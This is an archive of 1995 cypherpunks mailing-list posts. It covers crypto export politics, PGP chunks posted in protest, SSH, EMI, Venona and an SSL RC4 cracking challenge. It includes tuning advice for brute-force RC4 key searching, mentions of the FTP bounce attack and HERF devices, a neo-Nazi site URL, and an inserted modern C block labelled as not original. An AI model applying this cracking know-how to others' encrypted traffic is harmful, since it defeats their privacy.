Message-ID: <199507121652.LAA15243@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>I just looked @ the front of a M.O. computer catalog & the numerals in the
>prices are anything but random. A very heavy concentration of eights (8) &
>nines (9), apparently this company is more into $508.98 (color inkjet printer)
>& $38.98 (well known game s/w) than the old late night TV standby of
>"JUST $19.99!". Of course, this is because of excessively documented
>ad nauseam human psychological tendencies that salescritters, who set at
>least the lsd's of price, have been aware of for millennia. I'd bet, that
>5(five), 8(eight), & 9(nine) are significantly more represented across
>the board in prices (& thus in amounts for checks & tax write offs) than
>their random distribution by Benford's Law or more well known tests
>for randomness would suggest. Has Mr. Negrini factored this into his program?
>I guess the lesson is do a few pgp make__random's & convert a few of the
>hex numbers to dec digits for the lsd's the next time one does creative expense
>reporting.
>
>tjh
>
Just an aside --
  J C Penney invented the $n.95 pricing scheme so that his clerks
would have to make change.  That way they had to use their registers,
recording the sale and the cash didn't just go into their pockets.
Even at that early date, proper security of automated systems depended
largely on human factors.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 12 Jul 95 10:54:36 PDT
To: erc@khijol.intele.net (Ed Carp [khijol Sysadmin])
Subject: EMI (was: Re: Don't trust the net too much)
In-Reply-To: <Pine.3.89.9507121027.B1475-0100000@khijol>
Message-ID: <199507121749.AA12206@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ed Carp said:

> This sounds like absolute propaganda.  If you do the calculations, you'll 
> see that a 1 watt transmitter sitting 100 feet away from your target will 
> generate an EMF less than that 1000kW ERP TV transmitter array you just 
> flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
> falling out of the sky, and we don't. 

Oh, yes-- we do. The Army lost a small number (two or three) of
UH-60 Black Hawks in crashes where the flight control system suddenly
commanded extreme pitch or attitude changes. Why? In all the crash
cases, EMI from nearby TV or FM transmitters was found to be the
proximate cause. The Army, and Sikorsky, immediately went to work to
better shield the FCS from EMI.

It's interesting to note that the Navy's SH-60, a UH-60 variant, was
designed from the start to be EMI-immune. Ships' radars operate in the
10-100kW range, and that's a lot of EMI when you're landing 15-20m
away from the radar mast.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech even when you don't
perobich@ingr.com            | like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAQLM6fb4pLe9tolAQF9NgQAvwOl00o+zwfEsOXClVUgJ8odeHjq5B/Z
+2O8pHo04cSin0wwsrRqdu/3XOwQ6UZpZmw/cnxBglZOnTwVvtoTkb/ZpYhPZr94
6tbnCCMxUb4W/Yiqz4sJ/AF4afxkyn6N9h8U0Hg86vkhYprTqIWL00/k1LDWkQOg
XhpWLcci/vg=
=LLsp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 12 Jul 95 12:49:09 PDT
To: cypherpunks@toad.com
Subject: Re: Q E D_j a k
Message-ID: <199507121947.MAA28807@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>      The American intelligence establishment today unveiled
>      one of its oldest secrets: how a small team of
>      codebreakers found the first clues that the Soviet Union
>      sought to steal the blueprints for the atomic bomb in

Wow!  They must really be looking for some good publicity these days.
I wonder how much of their motivation is to get PR support for the
black budget, and how much is to support continued crypto export laws?

After all, if the Evil Foreigners had good crypto, the NSA wouldn't
have been able to crack their codes, so therefore it's _vital_ to
_national_security_ that we continue these great laws that are keeping
good crypto securely locked up inside the US borders!

(Yes, I know one-time-pads are provably good crypto, but they also
depend on the security of key distribution and one-time use,
which apparently broke down here.  And the CIA's pretty good at
chasing the guys with briefcases of code material handcuffed to their arms.)

Watch for more pressure from the Administration....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Wed, 12 Jul 95 10:54:15 PDT
To: cypherpunks@toad.com
Subject: 17 down 696 to go /repost
Message-ID: <Pine.BSI.3.91.950712124927.6968A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Something's wrong with the Primenet Mail server I think.
I'm in pine, off the shell, so I can't sign it.

Love Always,

Carol Anne
                            PGP.ZIP PART [017/713]
                                       
   This just cycles through: when part 713 is reached, part 0 will be
   recycled. We are on export 0 at the moment.
     _________________________________________________________________
   

------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

   
     _________________________________________________________________
   
    Warning: it may be illegal to use one of these as a sig file in the US
    
   Don't feel obliged to use this chunk just because you have requested
   it. It hardly matters if some parts aren't posted as there are easier
   ways to get PGP, like open ftp sites, from which it is 100% legal for
   both US and non-US people to ftp from. It is merely a political
   statement about the ridiculous nature of ITAR regulations


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 12 Jul 95 10:53:54 PDT
To: "Jonathan Shekter" <jshekter@alias.com>
Subject: Re: general RC4 key searcher: optimisations anyone?
In-Reply-To: <9507121259.ZM1196@lennon.alias.com>
Message-ID: <9507121753.AA08575@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Shekter writes:
 > >After all, the kind of really high powered systems that can make a
 > >large dent in the key space are not running Windows NT.
 > 
 > 	Umm... ever hear of an Alpha?

Also, I've been quite impressed with the Pentium times.  It must have
something to do with the "friendliness" towards byte operations in the
Intel architecture.


(Also also, I should note that one can only have sympathy for anybody
trying to run NT on anything *but* a high-powered system :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan Shekter" <jshekter@alias.com>
Date: Wed, 12 Jul 95 10:00:16 PDT
To: cypherpunks@toad.com
Subject: Re: general RC4 key searcher: optimisations anyone?
Message-ID: <9507121259.ZM1196@lennon.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


>/* RC4 Brute Force Key Searcher, by Andy Brown 1995
>
>This part of the package is meant to be portable between most systems
>so that Unix users can take part in the searching. After all, the
>kind of really high powered systems that can make a large dent in the
>key space are not running Windows NT. You will, however, require

	Umm... ever hear of an Alpha? Besides which, this will compile on NT,
and just about every other OS known to man, so it's a moot point.


>#define SwapByte(a,b) ((a)^=(b),(b)^=(a),(a)^=(b))

	If the two values are in memory (which they are as you swap state
vector elements) then this xor trick requires three read-modify-write cycles --
slow on any architecture. Use a temp variable instead.

>/* prepare the key */
>
>for(counter=0;counter<256;counter++)
>state[counter]=(unsigned char)counter;

	This is bad. Use either a) memcpy as in bruterc4 or b) an unsigned
long, starting at either 0x00010203 or 0x03020100 depending on endianness,
adding 0x04040404 at each iteration to generate four bytes per shot. Remember,
on most machines a 32-bit store is the same speed as an 8-bit store. The fastest
I have been able to do on this section was obtained by unrolling the loop
manually, and using *two* long variables, alternating, to remove instruction
dependencies.

>for(counter=0;counter<256;counter++)
>
>index2=(key[index1]+state[counter]+index2) & 0xFF;
>SwapByte(state[counter],state[index2]);
>
>if(++index1==keybytes)
>index1=0;

1) This loop needs to be unrolled! Using direct array offsets instead of
incrementing the counter is a speedup on many machines. Also, experiment with
the unroll size. Making it larger increases performance until you get too big
to fit in the cache, at which point it slows down. My experiments on a few
different types of machines showed that unrolling the inner loop 16 or 32 times
was usually about right. See the inner loop of bruterc4. Use macros to do the
unrolling.

2) You can avoid the if statement for checking for key wrap around as follows:
in your initialization, construct an array as follows:

for (i=0; i<keysize-1; i++)
  transtbl[i] = i+1;
transtbl[i] = 0;

Then, after each iteration:

index1 = transtbl[index1];

Voila, no if statements, no divides or mods. On many architectures this is
worth the trouble as branches are expensive. Obviously, though, test this



>/* do two RC4 operations as a preliminary test. If this fails then test
>the next one, then the rest. This should result in a lot of rejections
>before the rest of the loop is entered */

	I like the early-out test.

>x=(x+1) & 0xFF;
>y=(state[x]+y) & 0xFF;
>SwapByte(state[x],state[y]);

  Again, swapping with xor probably hurts you here. Use a register temp
variable.


	My personal keycracker accepts general length keys and is not too much
 slower than bruterc4. So it can be done.


	- Jonathan

-- 
    ____________________________________________________
   /   Jonathan Shekter   /                            /
  /   Graphics Hack      /   "Probability alone       /
 /  Alias/Wavefront     /   dictates that I exist"   /
/______________________/____________________________/
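
Added example, not part of the original thread and not Andy Brown's or Jonathan Shekter's code: the RC4 key setup with the three changes suggested in the message above (swap through a temporary, 32-bit word initialisation of the state, table-driven key index), checked against a plain reference version and the widely published keystream for the key "Key". The function names, the unroll factor of 4 and the run-time endianness probe are choices made for this example; the last function shows that the quoted XOR SwapByte macro zeroes a byte when both arguments are the same array slot.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Reference key setup: byte-wise init, modulo for the key index. */
static void ksa_reference(unsigned char s[256], const unsigned char *key, size_t keylen)
{
    for (unsigned i = 0; i < 256; i++)
        s[i] = (unsigned char)i;
    for (unsigned i = 0, j = 0; i < 256; i++) {
        unsigned char t = s[i];
        j = (j + t + key[i % keylen]) & 0xFF;
        s[i] = s[j];
        s[j] = t;
    }
}

/* One key-setup step: temp-variable swap, key index advanced by table lookup. */
#define KSA_STEP(n) do {                 \
        unsigned char t_ = s[i + (n)];   \
        j = (j + t_ + key[k]) & 0xFF;    \
        s[i + (n)] = s[j];               \
        s[j] = t_;                       \
        k = next[k];                     \
    } while (0)

/* Key setup with the suggested changes; keylen must be 1..256. */
static void ksa_optimized(unsigned char s[256], const unsigned char *key, size_t keylen)
{
    unsigned char next[256];
    const uint32_t probe = 1;
    /* Start word chosen so its bytes sit in memory as 00 01 02 03. */
    uint32_t w = *(const unsigned char *)&probe ? 0x03020100u : 0x00010203u;
    unsigned i, j = 0, k = 0;
    /* next[k] = (k + 1) % keylen; a key searcher would build this once. */
    for (i = 0; i + 1 < keylen; i++)
        next[i] = (unsigned char)(i + 1);
    next[keylen - 1] = 0;
    /* Four state bytes per store; no byte ever carries (largest value is 0xFF). */
    for (i = 0; i < 256; i += 4) {
        memcpy(s + i, &w, 4);
        w += 0x04040404u;
    }
    /* Unrolled by 4 to keep the example short; the message suggests 16 or 32. */
    for (i = 0; i < 256; i += 4) {
        KSA_STEP(0); KSA_STEP(1); KSA_STEP(2); KSA_STEP(3);
    }
}

/* Keystream generation, again swapping through a temporary. */
static void rc4_keystream(unsigned char s[256], unsigned char *out, size_t n)
{
    unsigned x = 0, y = 0;
    for (size_t m = 0; m < n; m++) {
        x = (x + 1) & 0xFF;
        unsigned char t = s[x];
        y = (y + t) & 0xFF;
        s[x] = s[y];
        s[y] = t;
        out[m] = s[(s[x] + s[y]) & 0xFF];
    }
}

/* Returns 1 if both key setups leave the state vector identical. */
int ksa_variants_agree(const unsigned char *key, size_t keylen)
{
    unsigned char a[256], b[256];
    ksa_reference(a, key, keylen);
    ksa_optimized(b, key, keylen);
    return memcmp(a, b, 256) == 0;
}

/* Returns 1 if the first n (<= 32) keystream bytes equal expect. */
int keystream_matches(const unsigned char *key, size_t keylen,
                      const unsigned char *expect, size_t n)
{
    unsigned char s[256], out[32];
    if (n > sizeof out) return 0;
    ksa_optimized(s, key, keylen);
    rc4_keystream(s, out, n);
    return memcmp(out, expect, n) == 0;
}

/* The quoted XOR macro applied to one slot twice (the i == j case): result 0. */
#define SwapByte(a,b) ((a)^=(b),(b)^=(a),(a)^=(b))
int xor_swap_same_slot(unsigned char v)
{
    unsigned char s[1] = { v };
    SwapByte(s[0], s[0]);
    return s[0];
}

int main(void)
{
    static const unsigned char ks[] = { 0xEB, 0x9F, 0x77, 0x81, 0xB7 };
    const unsigned char *key = (const unsigned char *)"Key";
    printf("agree=%d vector=%d xor_same_slot=0x%02X\n", ksa_variants_agree(key, 3),
           keystream_matches(key, 3, ks, 5), xor_swap_same_slot(0x5A));
    return 0;
}
```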




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 12 Jul 95 04:10:14 PDT
To: hobbit@avian.org
Subject: Re: The FTP Bounce Attack
Message-ID: <9507121103.AA14708@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Also a nice way to walk through firewalls.

Perhaps you could write a SATAN script to check it.
And you should send a copy of your description to
CERT.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phiberflea@aol.com
Date: Wed, 12 Jul 95 10:17:40 PDT
To: cypherpunks@toad.com
Subject: Free Directory Pinpoints E-Mail Addresses
Message-ID: <950712131505_31185620@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Team,

Received this little blurb in my e-mail.  

>Free Directory Pinpoints E-Mail Addresses
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>  Palo Alto, Calif. -- ....  Well, SLED Corp. has stepped up to answer the
>call of all the Internet
>users who have ever screamed  "How can I find someone's e-mail address?"
>.....
>  The Palo Alto-based company recently released its Four11 Online User
>Directory as a free service for Internet users. The directory is easily
>searched by e-mail, through the use of e-mail forms, or the Web, by using
>browsers such as Mosaic or Lynx. Search parameters include name, location,
>old e-mail address, Group Connection and wildcards.
>...Membership also includes PGP encryption certification and storage
>services. Members who provide proper identification can have their PGP
>public key signed with the SLED Silver Signature. Signed keys are added
>to the key owner's directory listing and can be quickly retrieved by other
>Internet users through either e-mail or the Web. These keys, actually
>small data files, are used to send private messages and verify digital
>signatures. The combination of an Internet wide directory with a PGP key
>server makes it possible to quickly find someone, obtain their key, and
>send them a secure message.

Things that make you go hmmmm....

Ginger
Shei shuo zhong-guo hua?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 12 Jul 95 10:28:19 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
Message-ID: <199507121725.NAA17614@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <doug-9506121351.AA0053320@netman.eng.auburn.edu>,
Doug.Hughes@Eng.Auburn.EDU (Doug Hughes) wrote:

>Go see Winn Schwartau talk about HERF guns sometime. He passed around
>a picture of a device for < US$500 that could crash any computer within
>50 yards..  Then again, it isn't too good for the person firing the gun

URL, anyone? I'd like to build one of those devices.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAQFfSoZzwIn1bdtAQGWBQF/YHqHS5rJfVnuLDd3SV+oq1KhXsP47mE8
WW6IPO+mCDlN+liSfU/4NujUT7mAfLl1
=G/P3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 12 Jul 95 09:52:17 PDT
To: ylo@cs.hut.fi (Tatu Ylonen)
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <199507121451.RAA06122@shadows.cs.hut.fi>
Message-ID: <m0sW5hj-0009ydC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


FANTASTIC!!!!
I think we've all been waiting for / building this.
Kudos...

> Looking for a secure rlogin?
> Want to deter IP-spoofing, DNS-spoofing, and routing-spoofing?
> Want to run X11 connections and TCP/IP ports securely over an insecure network?
> Worried about your privacy?
> Then read this.
> 
> 
> Introducing SSH (Secure Shell) Version 1.0
...

Quibbles/suggestions:

ssh, while an obvious name, already collides with a nice shar decoder and
a different kind of secure shell from CFS.

Probably a worthwhile collision though.

Second: 

It would be very helpful if the socket connection could be made (optionally)
through a telnet proxy for firewalls (with optional quoting of problem
characters).  I've actually done this with TERM and a helper program.

I may produce a patch for this.

Third:

Of course support for S/Key and tokens/hand held authenticators would be
useful additions for some situations (although inferior to RSA...).

Fourth:

Someone needs to crank out a Windows/Mac client... (Lower priority, but
still useful.)

Fifth:

udprelay etc. could also be borrowed from the term suite.

Sixth:

Integration with TCP/NFS and/or client-server CFS would be fantastic.
(One local CFS server acting as a secure client over tcp to a remote
CFS server.)
Remote encrypted mount of an encrypted partition...

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 10:39:33 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
Message-ID: <9507121739.AA10924@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> If you saw that PBS documentary (they want $20,000 for rebroadcast by the 
> way). It was an 87 or 88 or something like that. It would make you
> a believer. There was a lady in a van that whenever she used her cellular
> phone, her son's breathing apparatus (lung impaired) went into alarm.
>  There was another case at a hospital pre-natal care ward near the main
> entrance to the hospital. Several occasions when a local bus loop went
> by, and the guy happened to be talking on the intercom of the bus, several
> of the units in the ward went into alarm and failed (they had a tough time
> tracking that one down by the way). 

There is a huge difference between noting that some electronic
equipment is temporarily vulnerable to interference, or that you can
read screens at a distance from the emitted radiation, and saying that
you can build these portable ray-guns that cause computers to fry at
200 yards.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Wed, 12 Jul 95 10:49:05 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121505.AA10601@snark.imsi.com>
Message-ID: <Pine.A32.3.91.950712134619.10210J-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Perry E. Metzger wrote:

> Doug Hughes writes:
> > I think there was a question of some microelectronics being permanently
> > damaged because of fusion at the MOS level (burning through the
> > gate),
> 
> To do that requires that you transfer energy from your device into the
> computer you are attacking. How do you propose to do that?

airburst? :)

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 11:02:56 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <199507121754.KAA19611@blob.best.net>
Message-ID: <9507121801.AA10968@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" writes:
> At 07:46 AM 7/12/95 -0400, Perry E. Metzger wrote:
> >
> >
> >And why, pray tell, did you repost this here?
> 
> Presumably because government instruments of repression are entirely
> relevant to the Cypherpunks list.

I'll be posting my 900 page listing of prison locations, then. I'm
sure it's relevant, right?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 12 Jul 95 11:29:04 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <Pine.SUN.3.91.950712113043.23433A-100000@access1.digex.net>
Message-ID: <Pine.SUN.3.91.950712141642.11949B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Black Unicorn wrote:

> How elegant the way the National 
> Cryptological museum was opened.  No fanfare, no publicity, no 
> invitations, just there to be discovered at first, like a little 
> secret.  Stuck in an old motel, barely visible from Route 32, 
> dwarfed by the massive NSA complex.  

No way!  That hotel was the place my parents stayed on the night after 
their marriage...

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 12 Jul 95 05:42:07 PDT
To: pgf@tyrell.net
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <9507121233.AA15475@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



>    There are certain Nazi pages in America. They were showing them in
>    a German TV magazine some time ago, but they didn't tell the URLs.
>    The URL field in the Mosaic window was painted over.

> How do you know they weren't local?


Because it was an article about Networks in America. They said
it was an American web server and they explained how they found
it. They found the link on one of these service web pages, and
they had an interview with the administrator of this server. They
asked him why he has put such links on his honorable server. He
answered he didn't have the time to check all references, but
in this certain case he will have a look at the page and decide
whether he will keep the link or not (if I remember everything well).
This was also an American server.

And the Nazi pages were written in English. The pages were named
after the author of the pages (something like 'The XY report', where
XY was the author's name, but I can't remember it. The author was
an American).

BTW: The German TV magazine was the "Kulturreport".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 12 Jul 95 11:58:03 PDT
To: sebaygo@intellinet.com
Subject: Re: Stormfront (was Re: FW: Edupage 7/9/95 (fwd))
In-Reply-To: <Pine.3.89.9507111731.B24086-0100000@sibyl.intellinet.com>
Message-ID: <199507121855.OAA29076@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 11 Jul 1995, Perry E. Metzger wrote:

> > I suspect that something is amiss (i.e. faked) about the following,
> > but wat.com shows up as
> > 
> > Wongs Advanced Technologies (WAT-DOM)
> >    3221 Danny Pk
> >    Metairie, LA 70002
> > 
> >    Domain Name: WAT.COM


The following seems to work.
>      http://stormfront.wat.com/stormfront/

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Wed, 12 Jul 95 13:13:15 PDT
To: perry@imsi.com
Subject: Re: QED_jak
Message-ID: <9507122009.AA0581@localhost>
MIME-Version: 1.0
Content-Type: text/plain





Perry Metzger writes:
> 
> 
> John Young writes:
> >    "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
> >    Clues That Led to Code-Breaking."
> > 

[snip]
> The reports claimed the spies were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?
> 
> .pm
> 
> 
> 

A real good book with a fair amount of details is Peter Wright's great
book "Spycatcher". The clueless media concentrated on Wright's allegation
that Sir Roger Hollis, head of MI5 was a Soviet mole or the "5th Man"
of the Philby, Burgess, Maclean & Blunt spyring. Now Wright may have been
in Jesus Angleton's psychotic "wilderness of mirrors" too long, but he
did a lot of bugging & stuff w/ GCHQ & he spends a great deal of his book
talking about precisely the Venona decrypts. Briefly there was some reuse
of "one time pads". He gives a fair amount of detail, & I suspect this is
why HRM Govt. was so displeased, the supposed "embarrassment" of the
allegations against long dead Sir Roger being just a cover story & much
easier for the tabloids & general public to understand.

tjh 


This is 1/713 of PGP262i DOS Executable Zipfile UUE'd
Violate the Un-Constitutional ITAR Today!
Get YOUR chunk @ web site below.

------------------ PGP.ZIP Part [005/713] -------------------
M@UIXP9EW\".^Q0XL1SO8"^*_O:U-=H(P&2,1A6YHB?KP@@H2/)$+P@-<PX_(
MPTGLPBHDHSW<(,<O,D$XB'2TA`HQ4D'H@R#<)[Z3*D$P80%N*8D1:Q6"T`\J
M/*/<G_$-/L9&%#L)P@HD82`ZHPG4$%#L*`A7D8M#F(/>"($GRAT$8246(Q:3
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Wed, 12 Jul 95 13:00:08 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
Message-ID: <Pine.SOL.3.91.950712144956.21040X-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Doug Hughes wrote:
> Keep in mind that newer planes (767, 757) let you do anything you want
> while the plane is in flight (but not while landing or takeoff), so they
> probably build better instrumentation and cabin shielding into the planes
> these days. If they say keep it off, chances are they have a good reason..
> 
> If you find categorical evidence to the contrary, I'm sure I would be very
> relieved to see it posted here. (rather than wondering if somebody
> in one of the 30 rows ahead of me might decide he knows better)
> 
> Disclaimer: I have absolutely no idea what kind of shielding goes into
> an airplane nor any knowledge of building practices in the airline industry,
> but that should be obvious. ;)

In the Canadian CFS (Canada Flight Supplement), a manual distributed to 
all Canadian pilots and continuously updated, there is a section on this 
kind of thing.   The basic gist of it is that there is no proof that 
computers and cells cause interference, tests have proved inconclusive, 
but there is suspicion.  Then, of course, is a silly little form that you 
are supposed to fill out if you ever have such a problem.

As for cells, a colleague (with his Commercial rating, was going for an
Airline Transport Rating) swore up and down that cells do nothing, and
that the only reason there are phones on airplanes is because with a
standard cell you can phone just about anywhere locally because of the
range an air-ground connection would have at 30,000'.  The plane phones are
supposed to have some sort of device that uses the local cell and forces 
you to pay LD charges.  Whether it is true or not....

But anyway, aircraft instruments operate in just about all bandwidths (HF, 
VHF, UHF mainly, with VHF being very popular.)

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Bryna Bank/Jamie Lawrence)
Date: Wed, 12 Jul 95 15:09:51 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Racketeering Act
Message-ID: <199507122200.PAA23874@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>    "(a) It shall be unlawful--
> 
> . . .
> 
>       "(2) to distribute computer software that encodes or encrypts
>     electronic or digital communications to computer networks that the
>     person distributing knows, or reasonably should know, is accessible to
>     foreign nationals and foreign governments, regardless of whether such
>     software has been designated nonexportable."

Oh no - I can already see the T-shirt ideas congealing in people's minds:

Lbher Ohfgrq

in big block letters.

-j

-- 
On the internet, nobody knows you're a deity.
__________________________________________________________________________
Jamie Lawrence and Bryna Bank                          <foodie@netcom.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Wed, 12 Jul 95 13:00:15 PDT
To: cypherpunks@toad.com
Subject: Re: SSL RC4 challenge
In-Reply-To: <199507121722.KAA19834@jobe.shell.portal.com>
Message-ID: <199507122003.PAA02843@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Here is a challenge to try breaking SSL using the default exportable
> encryption mode, 40-bit RC4.  It consists of a record of a submission
> of form data which was sent to Netscape's electronic shop order form in
> "secure" mode.  However the data I entered in the form is not my real
> name and address.  The challenge is to break the encryption and recover
> the name and address info I entered in the form and sent securely to
> Netscape.

Can't we hold off a few weeks on this, so that we can all short the stock 
once it's been offered? <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 12 Jul 95 14:20:37 PDT
To: danisch@ira.uka.de
Subject: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507121233.AA15475@elysion.iaks.ira.uka.de>
Message-ID: <199507122115.AA03497@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


BTW, I read some of the follow-up messages and it turns
out the pages in question _weren't_ in the United States.

They were in Metairie!

I didn't mean to sound critical, BTW; it's just that after
the "porn is only a click away" school of journalism that's
been going on in _this_ country (loosely defined enough to
include Louisiana).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 12 Jul 95 08:41:28 PDT
To: linux-announce@stc06.ctd.ornl.gov
Subject: Privtool 0.84a
